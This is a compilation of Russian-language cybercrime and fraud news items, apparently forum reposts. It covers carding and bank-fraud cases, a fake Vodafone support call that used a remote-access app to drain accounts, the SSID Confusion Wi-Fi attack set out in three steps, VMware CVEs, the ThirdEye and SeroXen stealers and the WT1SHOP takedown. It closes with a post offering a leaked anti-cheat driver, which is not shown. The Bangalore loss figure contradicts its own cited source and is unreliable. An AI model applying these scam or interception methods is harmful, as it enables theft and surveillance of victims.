Полиция навестила подозреваемых прямо по местам их жительства. При этом в домах были проведены обыски, а сами кардеры были взяты под стражу. Личности членов группировки не разглашаются. Как минимум один из них имел криминальное прошлое и даже настоящее: на его имя выданы несколько ордеров на арест, в том числе по обвинению в хранении оружия.
В полиции уточнили, что значительное количество жертв кардеров либо не знают, что их обокрали, либо знают, но в правоохранительные органы пока не обратились. Судя по имеющимся данным, группировка была активна как минимум с марта по октябрь 2023 года.
source: kstp.com/kstp-news/local-news/3-people-arrested-in-connection-with- credit-card-fraud-identity-theft-in-brooklyn-center
Федеральный суд США приговорил 22-летнего руководителя мошеннической группировки к 8,5 года тюремного заключения. По данным Fox10, Аррингтон Джейлун Гарднер (Arrington Jaylun Gardner) признал себя виновным еще в декабре 2022 года. При этом большая часть его подельников уже отбывает наказание.
Что любопытно, Гарднер проходил сразу по двум делам параллельно — по числу реализованных им мошеннических схем. При этом по второму делу приговор также оказался обвинительным (шесть лет), однако американцу разрешили отбывать свои два срока одновременно. Зато Гарднеру придется выплатить около 200 тысяч долларов финансовым организациям, которые он смог обмануть.
Группировка из 12 человек действовала в Алабаме, Джорджии, Миссисипи и Луизиане с декабря 2021 года по май 2022 года. Первая схема сводилась к обналичиванию поддельных и украденных чеков в банкоматах. Во втором типе краж Гарднер делал первые взносы за автомобили, однако на остальную сумму брал кредиты на фальшивые водительские удостоверения или используя данные реально существующих людей. Таким образом ему удалось приобрести BMW и Audi A5 Sportback.
Девять членов группировки Гарднера получили более мягкие сроки — от одного дня до трех лет лишения свободы. Остальные обвиняемые пока не узнали свои приговоры.
source: fox10tv.com/2023/09/28/semmes-man-show-admitted-two-separate-bank- fraud-schemes-gets-8-years-prison
Пытаясь решить проблемы с сетью, женщина дала мошеннику слишком много возможностей.
50-летняя женщина из Бангалора (Индия) потеряла более $3,8 млн. из-за киберпреступника, с которым она связалась после поиска в Google, чтобы решить проблему с плохой мобильной связью.
22 июня у женщины возникли проблемы с мобильной связью, и она нашла в Google номер службы поддержки поставщика услуг. Позвонив по указанному в Google номеру, она связалась с мужчиной, который утверждал, что является руководителем службы поддержки клиентов Vodafone Idea (подразделение Vodafone в Индии).
Оператор поручил женщине загрузить приложение для удалённого доступа/ После того, как женщина загрузила программное обеспечение, она поделилась своим экраном с оператором, предоставив ему доступ к своему телефону.
Мужчина проинструктировал женщину заплатить ($2,5) через Google Pay по определённому номеру, и женщина выполнила указание. По данным полиции, мужчина внимательно следил за приложением Google Pay, когда женщина выполняла транзакцию. Позже он взял приложение под свой контроль и начал переводить деньги с ее счетов. В общей сумме мошенник перевел более $3 млн.. тремя разными транзакциями через платежное приложение. При этом женщина не знала, что происходит на ее мобильном телефоне.
Опустошив 2 банковских счёта (женщины и ее дочери), преступник быстро получил доступ к другому счету в небольшом банке, с которого снял $72,4 тыс.
Встревоженная многочисленными сообщениями, поступающими из банков о снятии денег с ее счетов, женщина обратилась к этому же мужчине. Он ответил, что деньги будут возвращены в течение 24 часов, и ей не о чем беспокоиться. Когда женщина настояла на том, чтобы он немедленно вернул деньги, преступник отключился от разговора и исчез.
source: thehindu.com/news/cities/bangalore/complaint-of-network-problem-ends- with-bengaluru-housewife-losing-3-lakh-to-man-posing-as-vodafone-idea- customer-care-executive-rustdesk/article67040385.ece
В Москве накрыли банду карманников, создавших свою "школу" по краже телефонов.
Так называемое "Общество по краже мобильных телефонов" в столице было создано в 2021 году мужчиной, приехавшим из Рязани. Сначала "обучение" у него прошли четверо взрослых и три-девочки подростка.
В дальнейшем семь первых учеников стали "костяком" – лидерами группировки,
привлекавшими в нее других участников. В результате их деятельности частью
группы стали еще три девушки.
" Главной задачей учеников было красть мобильники у зазевавшихся граждан в
Москве".
Таким образом они украли мобильников на сумму более 500 тысяч рублей. Сейчас все участники группировки задержаны.
В отношении членов банды возбуждены уголовные дела по статьям "кража", "организация преступного сообщества" и "вовлечение несовершеннолетнего в совершение преступления".
После отказа Vice Society сразу же слила украденные данные в сеть.
Инцидент произошел в воскресенье утром – группировка Vice Society выложила на своем сайте данные, похищенные у Объединенного школьного округа Лос-Анджелеса (LAUSD) в начале сентября. Данные были слиты в сеть после того, как в пятницу представители школьного округа заявили, что не собираются уступать требованиям злоумышленников.
"Мы твердо уверены в том, что деньги должны использоваться для финансирования учащихся и образования", – говорится в заявлении, опубликованном LAUSD в пятницу. "Кроме того, уплата выкупа никогда не гарантирует полного восстановления данных. Мы считаем, что государственные деньги лучше потратить на учеников, а не капитулировать перед гнусным преступным синдикатом”.
"CISA потратило наше время, а мы подпортили репутацию CISA", – сообщение на сайте злоумышленников.
Сейчас правоохранительные органы изучают масштаб инцидента и пытаются понять, какие данные были украдены. Некоторые источники сообщают, что в сеть попали:
Психологические портреты учащихся;
Контрактные и юридические документы;
Деловые записи;
Записи в базах данных.
Ранее представители LAUSD заявляли, что уведомят всех, кто мог пострадать от кибератаки и предоставят помощь. Однако этот процесс затягивается, так как анализ данных займет некоторое время, которого вполне может хватить злоумышленникам для проведения различных махинаций с ними.
Разработчики VMware исправили несколько серьезных проблем в составе Carbon Black Cloud Workload и VMware vRealize Operations (vROps).
Уязвимость в Carbon Black Cloud Workload получила идентификатор CVE-2021-21982 и набрала 9,1 балла из 10 возможных по шкале CVSS v3. Баг обнаружен Егором Димитренко из компании Positive Technologies исвязан с административным интерфейсом. Он позволяет злоумышленникам обойти аутентификацию, манипулируя URL-адресом в интерфейсе.
«Злоумышленник с сетевым доступом к административному интерфейсу VMware Carbon Black Cloud Workload может получить действительный токен аутентификации, предоставляющий доступ к API», — гласит официальный бюллетень.
Click to expand...
Таким образом, атакующий мог использовать ошибку для выполнения произвольного кода на сервере.
Также Дмитриенко выявил две уязвимости в составе VMware vRealize Operations (vROps), решения для мониторинга и оптимизации производительности виртуальной инфраструктуры, а также устранения неполадок в ней.
Более опасная уязвимость была обнаружена в API vROps. Ошибка с идентификатором CVE-2021-21975 и оценкой 8,6 по шкале CVSS v3 относится к типу SSRF- уязвимостей, то есть позволяет выполнить подделку запросов на стороне сервера. С ее помощью любой неавторизованный злоумышленник может украсть учетные данные администратора и получить доступ к приложению с максимальными привилегиями, что позволяет изменять конфигурацию приложения и перехватывать в нем любые данные.
«Основной риск заключается в том, что привилегии администратора позволяют воспользоваться второй уязвимостью — CVE-2021-21983 (загрузка произвольных файлов, arbitrary file write, оценка 7,2), а это даст возможность выполнять любые команды на сервере, — объясняет Егор Димитренко. — В результате объединение двух недостатков безопасности усиливает опасность ситуации, так как фактически позволяет неавторизованному злоумышленнику захватить контроль над сервером и начать дальнейшее продвижение в инфраструктуре компании. Комбинация этих двух уязвимостей по уровню угрозы сравнима с ошибкой CVE-2021-21972 в VMware vCenter, которую мы обнаружили ранее».
Click to expand...
В числе причин возникновения уязвимостей, подобных CVE-2021-21975, исследователь называет стремление разработчиков решать поставленные перед ними задачи самыми удобными способами, которые не всегда эффективны с точки зрения безопасности. А причиной возникновения уязвимости CVE-2021-21983 часто становится недостаточная фильтрация входных данных, поступающих от пользователя.
Источник: xakep.ru/2021/04/06/vmware-problems/

До того, как поставить свой рекорд, Уиллис Гибсон занял третье место на Чемпионате мира по классическому тетрису в 2023 году
Американский школьник стал первым в истории человеком, закончившим последний
уровень в культовой советской видеоигре «Тетрис» спустя 40 лет после ее
изобретения инженером Алексеем Пожитновым.
13-летний Уиллис Гибсон из штата Оклахома опубликовал на своем канале в
YouTube момент, когда он переходит на 157 уровень игры, она выдает ошибку и
зависает.
«Я сейчас отключусь, не чувствую своих пальцев», - восклицает мальчик и падает
на кресло.
У Уиллиса ушло всего 38 минут на то, чтобы дойти до 157-го уровня, очевидно,
последнего, когда блоки больше не падают и экран зависает.
При этом всего несколько лет назад поклонники «Тетриса» считали, что в него
можно играть только до 29 уровня.
Суть игры в том, что игрок выстраивает падающие «строительные блоки» в
горизонтальные линии. Как только получается ровный ряд без пробелов, он
исчезает, за что начисляются очки.
«Тетрис» получил мировую славу спустя пять лет после его изобретения в СССР.
В 1989 году игра вышла на платформах Nintendo, включая портативный «геймбой».
Сейчас она доступна на приставках, компьютерах, планшетах и мобильных
телефонах.
В 2010 году профессиональному геймеру из США Тору Акерлунду удалось достичь
30-го уровня в «Тетрисе», используя технику, известную как гипертаппинг и
позволяющую нажимать клавиши контроллера со значительно более высокой
скоростью.
После этого другие геймеры начали использовать гипертаппинг и прочие новые
методы, чтобы посмотреть, как далеко они смогут пройти.
Эта техника после 2018 года позволяла неизменно побеждать на чемпионатах мира
по классическому «Тетрису».
Но до недавнего времени только искусственный интеллект мог дойти до 157-го
уровня, на котором игра останавливалась.

АВТОР ФОТО,ALAMY
Подпись к фото,
Когда «Тетрис» вышел на приставках Nintendo, он стал одной из их самых
продаваемых игр
Нынешний рекордсмен Уиллис Гибсон, которого на YouTube зовут Blue Scuti,
играет в «Тетрис» с 11 лет и участвовал в нескольких турнирах.
«Когда я начал играть в эту игру, я даже не ожидал, что когда-нибудь сломаю
или выиграю ее», — написал он на своем канале на YouTube.
По словам Уиллиса, он не только победил в игре, но и побил общий результат и
три других мировых рекорда по «Тетрису».
Успех Гибсона вдохновил других геймеров на то, чтобы попытаться побить его
рекорд. Многие из них документируют свои попытки в социальных сетях и на
сайтах потокового видео.
© https://www.bbc.com/russian/articles/cv25rx4em3vo новость датирована 3 января 2024
Дроп который передал свою банковскую карту мошенникам, предстанет перед судом в Анжеро-Судженске
19-летнему работнику пункта выдачи заказов предъявлено обвинение в неправомерном обороте средств платежей.
Сотрудники отдела экономической безопасности и противодействия коррупции ОМВД России по Анжеро-Судженскому городскому округу получили информацию от специалистов банка о сомнительных операциях по одному из счетов. Полицейские опросили клиента, которому принадлежит счет, и выяснили, что мужчина открыл его в декабре прошлого года по просьбе незнакомца за вознаграждение.
Обвиняемый выполнил все условия и предоставил неизвестному доступ к системе дистанционного банковского обслуживания, а также передал курьеру банковскую карту, но обещанные за услугу деньги так и не получил.
В ходе следствия установлено, что на банковский счет фигуранта в течение недели переведены и обналичены 230 000 рублей, которые были получены злоумышленниками обманным путем от жертв дистанционного мошенничества.
Уголовное дело направлено в Анжеро-Судженский городской суд. Санкции статьи обвинения предусматривают в качестве максимального наказания 6 лет лишения свободы.
Группа исследователей из Лёвенского католического университета (Бельгия), выявила архитектурную уязвимость (CVE-2023-52424) в стандарте Wi-Fi IEEE 802.11, [позволяющую](https://www.top10vpn.com/assets/2024/05/Top10VPN-x-Vanhoef-SSID- Confusion.pdf) организовать подключение к менее защищённой беспроводной сети, вместо заслуживающей доверия сети, к которой намеревался подключиться пользователь, после чего можно организовать перехват и манипуляции трафиком. Проблема проявляется в беспроводных стеках любых операционных систем и затрагивает методы аутентификации WPA3, WEP, EAP, AMPE и FILS.
Предложенная техника атаки, которой присвоено имя SSID Confusion, позволяет обойти присутствующие в протоколе методы аутентификации точки доступа, защищающие от подмены идентификатора сети SSID и не позволяющие создавать подставные сети с именем сети, к которой подключается клиент. Причиной проблемы является определение в стандарте ситуаций, когда SSID может быть неаутентифицирован. В частности, для обозначения своего присутствия точка доступа отправляет в широковещательном режиме beacon-кадры, включающие сведения о SSID-сети. Для упрощения процесса поиска сети клиенты не аутентифицируют SSID в данных кадрах, так как предполагается, что проверка потребуется после того, как клиент решит подключиться к сети.
Для успешного совершения атаки требуется, чтобы пользователь инициировал подключение к определённой беспроводной сети, а поблизости была другая беспроводная сеть с теми же параметрами подключения, что и в первой сети. Подобное практикуется, например, когда для диапазонов 2.4GHz и 5GHz создаются разные сети, одна из которых слабо защищена и уязвима для типовых атак по перехвату трафика, таких как KRACK или Frag. Проблемная конфигурация также применяется в некоторых университетских сетях, поддерживающих сервис Eduroam. Атакующий должен находиться в зоне досягаемости сигнала для того, чтобы вклиниться между пользователем и целевой сетью (MitM). Для проведения атаки злоумышленнику не требуется знать учётные данные жертвы.
Атака сводится к созданию атакующим точки доступа (WrongAP на диаграмме), обеспечивающей на другом канале трансляцию обращений к менее защищенной подставной сети (WrongNet), к которой должен подключиться клиент вместо желаемой сети (TrustedNet). Точка доступа может быть создана на обычном ноутбуке и применяется для организации многоканальной MitM-атаки на жертву (MC MitM). Атака осуществляется в три этапа:
1. Определение сети (Network Discovery). MitM-система перехватывает пакеты, отправляемые в эфир жертвой и заслуживающей доверия точкой доступа (TrustedNet), заменяя в них SSID - в пакетах от точки доступа SSID заменяется на идентификатор менее защищённой сети, а в ответах жертвы на реальный, чтобы симулировать взаимодействие клиента и заслуживающей доверия точки доступа. В итоге устройство жертвы получает ответы и считает, что искомая сеть находится поблизости, несмотря на то, что эти ответы транслируются точкой доступа атакующего.
2. Захват аутентификации (Authentication hijacking). Атакующий симулирует успешную аутентификацию и вынуждает клиента подключиться к менее защищенной сети, вместо заслуживающей доверия. Как и на прошлой стадии атакующий перехватывает кадры, отправляемые при аутентификации клиентом, заменяет в них SSID и переотправляет точке доступа.
3. MitM. После согласования канала связи атакующий подменяет SSID c WrongNet на TrustedNet, создавая впечатление, что пользователь работает через заслуживающую доверия сеть, а не через менее защищенную сеть.
Воспользовавшись уязвимостью атакующий может вынудить клиента подключиться к менее защищённой сети, и при этом в интерфейсе будет отображаться SSID сети, к которой изначально намеревался подключиться пользователь, а не той, к которой он подключён фактически. Добившись подключения пользователя через не защищённую сеть атакующий может анализировать и вклиниваться в незашифрованные потоки трафика. При этом при использовании некоторых VPN, таких как WARP, hide.me и Windscribe, VPN не будет задействован при подключении к сетям, помеченным в настройках как заслуживающие доверия.
Атака применима к протоколам беспроводной аутентификации, использующим EAP (Extensible Authentication Protocol), SAE (Simultaneous Authentication of Equals) и 802.1X, а также в опциональном режиме работы протокола WPA3, в которых SSID не используется при формировании ключа PMK (Pairwise Master Key), что делается для исключения изначально известных данных при формировании ключа с целью защиты от различных криптоатак. Протокол FILS (Fast Initial Link Setup) уязвим при использовании PMK, созданного при согласовании соединения на базе EAP. Протоколы WPA1, WPA2 и FT (Fast BSS Transition) не подвержены проблеме, так как требуют корректного SSID при согласовании соединения.
Для защиты от атаки SSID Confusion на стороне точки доступа упоминается включение в стандарт 802.11 требования аутентификации SSID при подключении, что может быть реализовано через добавление SSID в функцию формирования ключа или включение SSID в число дополнительных данных, проверяемых во время согласования соединения. На стороне клиента защита может быть организована через обеспечение защиты beacon-кадров (будет применяться в WiFi 7). Создатели сетей могут предотвратить совершение атаки, отказавшись от использования общих учётных данных в сетях с разными SSID. Пользователи могут защитить себя, используя надёжные VPN при подключении через любые беспроводные сети.
По данным полиции, организаторы финансовой пирамиды действовавшие на территории Одесской области, привели к потере более 5.000.000 гривен у граждан. Они предлагали гражданам инвестировать средства в развитие программного обеспечения, обещая невиданные богатства. Однако на самом деле компания изначально не имела намерения осуществлять какие либо выплаты
Чтобы мамонты ничего не подозревали организаторы создали сайт компании и организовывали публичные мероприятия, где распространяли ложную информацию о своей деятельности. В результате 25 граждан понесли убытки, а общая сумма ущерба составила более 5 миллионов гривен. Сейчас в уголовном производстве потерпевшими признаны 25 граждан.
В ходе проведения обысков по месту жительства фигурантов правоохранители изъяли компьютерную технику, банковские карты, мобильные телефоны, которые были орудием совершения преступлений, а также другие вещественные доказательства.
Подозреваемым избрали меры пресечения в виде содержания под стражей с альтернативой внесения залога.
Вкратце, в РФ рожающие женщины на дому, вправе засвидетельствовать в ЗАГС'е факт рождения ребенка через свидетеля, заполнившего форму № 6 — с этого момента они могут претендовать и на материнский капитал и соответствующие пособия при рождении.
Так вот, мошенник армянского происхождения Арам Багиян вместе со своей подельницей находили одиноких женщин (чаще всего цыганской национальности), готовых пойти на обман государства, свидетельствовали что те родили девочку в их присутствии и, через схему с кредитно-потребительским кооперативом, якобы выдававшим роженицам займы на приобретение земельного участка, обналичивали причитающийся им материнский капитал.
Всего, казанские следователи, насчитали 708 фиктивных детей, с общим ущербом для бюджета в 303 миллиона рублей.
По данным компании [Coveware](http://www.coveware.com/blog/2024/1/25/new-
ransomware-reporting-requirements-kick-in-as-victims-increasingly-avoid-
paying), специализирующейся на переговорах с вымогателями, в последнем
квартале 2023 года количество жертв программ-вымогателей, выплачивающих выкуп,
снизилось до рекордно низкого уровня — 29%.

Тенденция стала очевидной еще в середине 2021 года, когда уровень выплат упал
до 46% (после 85% в начале 2019 года). По мнению исследователей, причина этого
снижения многогранна: это и повышенная готовность организаций к атакам, и
недоверие к киберпреступникам, обещающим не публиковать украденные данные, и
юридическое давление в некоторых странах, где выплата выкупа запрещена
законом.
Компания обнаружила, что даже в случае хищения данных уровень выплат в
последнем квартале 2023 года составил всего 26%.
Также отмечается, что снижается не только количество жертв, заплативших
злоумышленникам, но и сами суммы фактических выкупов в долларах. По данным
Coveware, средняя сумма выкупа в четвертом квартале 2023 года составила 568
705 долларов, что на 33% меньше, чем в предыдущем квартале, а медианный размер
выкупа составил лишь 200 000 долларов.

Помимо приведенных в отчете статистических данных, Coveware затронула и
спорную тему запрета на выплату выкупов и того, как это может повлиять на
атакуемые организации и хакерское сообщество.
Как отмечает компания, теоретически запреты кажутся хорошей идеей, на практике все не так просто. Coveware полагает, что если в США или других странах будут введены законодательные запреты, компании, скорее всего, вообще перестанут сообщать властям о подобных инцидентах и будут решать свои проблемы с помощью теневых посредников.
То есть быстро возникнет крупный нелегальный рынок, и весь прогресс, достигнутый в сближении жертв и правоохранительных органов, будет сведен на нет.
«Значительная часть жертв быстро подсчитает риски (ущерб компании по сравнению с риском штрафов и санкций), а затем начнет искать поставщиков услуг на нелегальном рынке. Некоторые компании все равно будут сообщать о случившемся, но любая жертва, которая хотя бы рассматривает вариант оплаты выкупа, или точно решит платить, абсолютно точно будет держать все в тайне, поскольку, сообщив об этом, она признается в преступлении», — считают эксперты.
Click to expand...
Поэтому вместо введения запретов Coveware предлагает усилить некоторые из существующих механизмов и инициатив, которые делают получение прибыли от вымогательства более сложным.
Лев Клебанов, ведущий ученый Российской академии наук и эксперт в области защиты банковских данных, мамонтизировался на 6 602 000₽. Всё началось со звонка от "коллеги из университета". Он пел, мол, Клебанова ищут для сотрудничества со замминистром Минобрнауки.
Он хотел связаться по номеру, но там сказали, что он занят. В итоге ему перезвонил гэкающий голос, и сказал, что на него мошенники кредиты оформили туда-сюда, ну и улетели все сбережения величайшего профессора на безопасные счета.
Гражданин Великобритании, Идрис Дайо Мустафа, признал себя виновным во взломе электронной почты, брокерских счетов и хищении свыше $6 000 000.
Ему грозит до 20 лет бутылирования.
Согласно материалам дела, в период с 2011 по 2018 год Мустафа и его неустановленные сообщники кардили с помощью фишинговых атак.
Параллельно Мустафа занимался музыкой в составе афробит-группы Built to Win Baller’s Club под псевдонимом Drizzle Lomo.
Маск готов отдать миллиард Wikipedia... но не все так просто
Илон Маск сделал неожиданное предложение онлайн-энциклопедии Wikipedia. Он обещает пожертвовать миллиард долларов, если они согласятся переименовать свой сайт в "Dickipedia". Musk написал в своем аккаунте: "Я дам им миллиард долларов, если они изменят свое имя на Dickipedia. Пожалуйста, добавьте это к [эмодзи коровы и кучки] на моей вики-странице в интересах точности".
Журналист Ed Krassenstein выразил поддержку этой идее, предложив Wikipedia принять предложение и затем вернуть прежнее имя. Ответив на это, Musk уточнил: "Минимум на год. Я же не дурак".
Предложение Маска было вызвано его ранее высказанным недовольством финансовыми запросами Фонда Wikimedia. Он критиковал фонд за большие финансовые потребности, заявив, что "весь текст Wikipedia можно уместить на вашем телефоне! Так за что эти деньги? Люди хотят знать...". Ответ пришел быстро: Wikipedia указала, что обрабатывает более 25 миллиардов просмотров страниц в месяц и более 44 миллионов редактирований страниц, что требует значительных операционных расходов.
Это не первый раз, когда Маск и Wikipedia сталкиваются в разногласиях. В мае сооснователь Wikipedia Jimmy Wales критиковал Маска за решение ограничить определенный контент на платформе X перед президентскими выборами в Турции.
В 2018 году Илон выразил намерение создать веб-сайт под названием Pravda, где общественность могла бы оценивать "основную правду" любой статьи и отслеживать "рейтинг достоверности" журналистов и их публикаций.
Сотрудники ГУЭБиПК МВД России вместе с коллегами из ЦАО задержали бывшего акционера и первого заместителя председателя правления коммерческого банка, а также бывших управляющих филиалами в Москве и Санкт-Петербурге.
Им предъявлено обвинение в хищении денег клиентов банков, фактически выдавая незастрахованные кредиты своим контролируемым лицам. В результате, Агентству по страхованию вкладов нанесен ущерб в размере более 940 миллионов рублей.
В ходе обысков у фигурантов были изъяты мобильные телефоны, цифровые носители информации и другие вещи, которые могут быть использованы в качестве доказательств. Согласно статье 160 УК РФ, возбуждено уголовное дело в отношении обнаруженных преступлений.
A previously undocumented Windows-based information stealer called ThirdEye has been discovered in the wild with capabilities to harvest sensitive data from infected hosts.
It found the malware in an executable that masqueraded as a PDF file with a Russian name "CMK Rules for issuing sick leaves.pdf.exe," which translates to "CMK Rules for issuing sick leaves. pdf.exe."
The arrival vector for the malware is presently unknown, although the nature of the lure points to it being used in a phishing campaign. The very first ThirdEye sample was uploaded to VirusTotal on April 4, 2023, with relatively fewer features.
The evolving stealer, like other malware families of its kind, is equipped to gather system metadata, including BIOS release date and vendor, total/free disk space on the C drive, currently running processes, register usernames, and volume information. The amassed details are then transmitted to a command- and-control (C2) server.
A notable trait of the malware is that it uses the string "3rd_eye" to beacon its presence to the C2 server.
There are no signs to suggest that ThirdEye has been utilized in the wild. That having said, given that a majority of the stealer artifacts were uploaded to VirusTotal from Russia, it's likely that the malicious activity is aimed at Russian-speaking organizations.
"While this malware is not considered sophisticated, it's designed to steal various information from compromised machines that can be used as stepping- stones for future attacks," Fortinet researchers said, adding the collected data is "valuable for understanding and narrowing down potential targets. "
The development comes as trojanized installers for the popular Super Mario Bros video game franchise hosted on sketchy torrent sites are being used to propagate cryptocurrency miners and an open-source stealer written in C# called Umbral that exfiltrates data of interest using Discord Webhooks.
"The combination of mining and stealing activities leads to financial losses, a substantial decline in the victim's system performance, and the depletion of valuable system resources," Cyble said.
Info Stealer Malware
SeroXen infection chain
Video game users have also been targeted with Python-based ransomware and a
remote access trojan dubbed SeroXen, which has been found to take advantage of
a commercial batch file obfuscation engine known as ScrubCrypt (aka BatCloak)
to evade detection. Evidence shows that actors associated with SeroXen's
development have also contributed to the creation of ScrubCrypt.
The malware, which was advertised for sale on a clearnet website that was registered on March 27, 2023 prior to its shutdown in late May, has further been promoted on Discord, TikTok, Twitter, and YouTube. A cracked version of SeroXen has since found its way to criminal forums.
"Individuals are strongly advised to adopt a skeptical stance when encountering links and software packages associated with terms such as 'cheats,' 'hacks,' 'cracks,' and other pieces of software related to gaining a competitive edge," Trend Micro noted in a new analysis of SeroXen.
"The addition of SeroXen and BatCloak to the malware arsenal of malicious actors highlights the evolution of FUD obfuscators with a low barrier to entry. The almost-amateur approach of using social media for aggressive promotion, considering how it can be easily traced, makes these developers seem like novices by advanced threat actors' standards."
Как сообщают правоохранители, 35-летний немец заработал нечестными путями более 1,4 миллиона евро.
По заявлению полиции, сделанному в четверг, полиция Греции арестовала 35-летнего гражданина Германии, который обвиняется в четырех случаях мошенничества и киберпреступлений. Три ордера на арест были выданы Германией, а еще один оказался международным. Известно, что арестованный заработал на мошенничестве и киберпреступлениях более 1,4 миллиона евро.
Полиция задержала преступника в среду, в аэропорту города Салоники. Во второй половине дня он был взят под стражу по европейскому ордеру на арест и в четверг его арестовали, не раскрывая имени.
Проведя дальнейшее расследование, полицейские обнаружили в мобильном телефоне подозреваемого 1 000 фотографий и видеозаписей с детской порнографией. Исследование также показало, мужчина руководил бандой мошенников, которые работали по схеме pig butchering. Кроме того, он выдавал себя за полицейского из особого подразделения, которое занимается расследованием деятельности педофилов. Для этого у него была полицейская форма и поддельное удостоверение, которое правоохранителям показала его мать.
Проведя обыски в его доме и машине, полиция обнаружила два номерных знака с номерами, принадлежащими немецким государственным автомобилям. Из этих двух номерных знаков один был поддельным, а вместе с ним были найдены и поддельные квитанции о выплате зарплаты от немецких государственных органов.
В отчете также упоминается, что банда, которой руководил мошенник, не ограничивалась только Германией – злоумышленники искали жертв по всему миру.
Сейчас преступнику грозит 10 лет тюрьмы за мошенничество на 1,4 миллиона евро.
Португальские власти заблокировали веб-сайт площадки, а США конфисковало четыре домена.
WT1SHOP был одним из крупнейших рынков по нелегальной покупке и продаже личных данных. На сайте можно было найти данные украденных кредитных карт, удостоверения личности и различные учетные записи. Маркетплейс предлагал свои услуги кардерам и мошенникам, похищающим аккаунты, а также рекламировался на различных русскоязычных хакерских форумах и в темах на Reddit, посвященных незаконной деятельности в интернете.
Однако сегодня Министерство юстиции США объявило, что португальские власти заблокировали веб-сайт WT1SHOP, а американские специалисты конфисковали четыре домена, которые использовались для доступа к маркетплейсу:
wt1shop.net;
wt1store.cc;
wt1store.com;
wt1store.net.
Другие домены, используемые WT1SHOP – wt1store.biz, wt1store.me, wt1store.xyz и wt1store.org, сейчас не заблокированы. Однако поскольку сайт недоступен, с их помощью больше нельзя получить доступ к маркетплейсу.
Операция по блокировке WT1SHOP была проведена прокуратурой США округа Мэриленд и ФБР. Их проверка показала, что на сайте было более 100 000 пользователей и 94 продавца, которые предлагали личные данные примерно 5,85 миллионов жертв.
Кроме того, в заявлении Минюста США говорится, что правоохранительные органы отследили платежи в биткоинах, адреса электронной почты и различные учетные записи, что вывело их на 36-летнего Николая Колесникова из Республики Молдова. Предполагается, что Колесников был администратором нелегального маркетплейса. Сейчас ему грозит максимальное наказание в виде 10 лет лишения свободы.
source: justice[.]gov/usao-md/pr/website-selling-stolen-login-credentials-and- other-personally-identifying-information
От действий кибермошенников в 2021 году пострадали более 1,5 тыс. жителей Гродненской области. Об этом сообщили в УВД Гродненского облисполкома.
В Гродненской области в 2021 году зафиксировано 1,8 тыс. преступлений в сфере высоких технологий. Это на 34% меньше, чем годом ранее. Снижения удалось добиться за счет активной профилактики, однако проблема остается актуальной.
От действий кибермошенников в 2021 году пострадали более 1,5 тыс. жителей Гродненской области. "Среди пострадавших лидируют люди среднего возраста со среднеспециальным образованием, рабочих специальностей (26,6%). Следующие - пенсионеры (13,5%). Замыкают тройку учителя и учащиеся (около 12%). Впрочем, как показывает статистика, на удочку мошенников попадаются все категории граждан. Удивительно, но среди жертв есть системные администраторы, сотрудники правоохранительных органов и работники банков - те, кто должен профилактировать преступления. Не застрахован никто", - рассказал начальник управления по противодействию киберпреступности КМ УВД Гродненского облисполкома Сергей Черняк.
Большую часть (86%) в структуре преступлений составляют хищения с использованием компьютерной техники. В тренде - хищения с использованием информации банковских карт. Мошенники под различными предлогами пытаются завладеть реквизитами карты, а также получить доступ к учетной записи. Схемы злоумышленников хорошо известны. Они звонят посредством мессенджеров, представляются работниками банков, служб безопасности и даже правоохранительных органов. Дальше под разными предлогами, например, подозрительной активности на счете, просят передать личные данные или установить на телефон или компьютер стороннюю программу.
Еще одна схема действует на площадках объявлений в интернете. Псевдопокупатель предлагает продавцу воспользоваться доставкой, уводит его по поддельной ссылке на стороннюю площадку, где необходимо указать реквизиты карты. После этого со счета списываются средства.
Также сейчас у мошенников популярна схема с оформлением кредитов. Они связываются с потенциальной жертвой под видом правоохранителей или представителей службы безопасности банка и просят посодействовать в поимке мошенника. Для этого якобы необходимо оформить кредит и перевести деньги на указанный счет. В стрессовой ситуации люди порой соглашаются. К слову, звонки зачастую поступают в мессенджеры с иностранных номеров.
Чаще всего пострадавшие теряют суммы до Br20 тыс. Рекорд в 2021 году установил программист из Гродно, перечисливший мошенникам Br75 тыс.
Правоохранителями уже установлены более 300 подозреваемых в совершении подобных преступлений. "Зачастую одним преступником совершены серийные преступления по 50-80 эпизодов по стране. Кроме того, в большинстве случаев преступники, совершая злодеяния, находились за рубежом, чаще всего в сопредельных государствах. Практически все колл-центры находятся в Украине и России", - рассказал Сергей Черняк. Он отметил, что в этом году гродненские милиционеры совместно с Управлением Следственного комитета по Гродненской области установили причастность к совершению ряда преступлений на территории области 6 граждан Украины, которые промышляли с 2018 года. Судить их будут на родине.
Министерство юстиции США сообщило, что в федеральный суд направлен иск о возврате $154 млн, украденных у филиала токийской корпорации Sony Group Corporation, а затем изъяты правоохранительными органами в ходе расследования ФБР. Ведомство сообщило, что сотрудник Sony Life Insurance Company Рей Исии (Rei Ishii) присвоил средства компании в мае 2021 года. Во время перевода денег между корпоративными счетами Исии сфальсифицировал инструкции для совершения транзакций. В результате деньги были переведены на счет Исии в банк, находящийся в Ла-Хойе, штат Калифорния. Затем Исии перевел их в 3 879 BTC, стоимость которых теперь превышает $180 млн.
В расследовании также принимали участие Sony и Citibank, Национальное полицейское агентство Японии, Департамент городской полиции Токио, окружная прокуратура Токио и Управление прокуратуры Японии по новым видам преступлений (JPEC). Правоохранительные органы смогли отследить биткоины, которые были переведены на адрес Биткоина, принадлежащий Исии, а затем в холодный кошелек. Следователям удалось получить закрытый ключ, необходимый для доступа к адресу Биткоина злоумышленника. 1 декабря биткоины были изъяты.
На основании доказательств, обнаруженных в ходе расследования ФБР, в июне 2021 года мировой судья Южного округа Калифорнии выдал ордер на арест Исии. В Японии ему также предъявлено уголовное обвинение.
Исполняющий обязанности прокурора США Рэнди Гроссман (Randy Grossman) назвал это дело примером слаженной работы агентов ФБР и японских правоохранителей, объединивших усилия для отслеживания цифровых активов. По словам Гроссмана, преступникам не стоит полагаться на криптовалюты, чтобы скрыть незаконно полученные деньги. Специальный агент ФБР Сюзан Тернер (Suzanne Turner) поблагодарила Sony и Citibank за то, что они немедленно обратились в полицию и стали сотрудничать с ней сразу после обнаружения кражи. Это значительно упростило работу следователей.
В прошлом году Министерство юстиции США сообщило о возврате средств обманутым клиентам криптовалютной биржи CoinGather, счета которой были арестованы в 2018 году. В ноябре Минюст США продал криптовалюты, изъятые у «промоутера» пирамиды BitConnect, для возмещения потерь пострадавшим пользователям.
RICOCHET Anti-Cheat Kernel Level Driver Leak
Here is the Ricochet leak, it was published a few hours ago in another forum, there has been enough news about it, enjoy

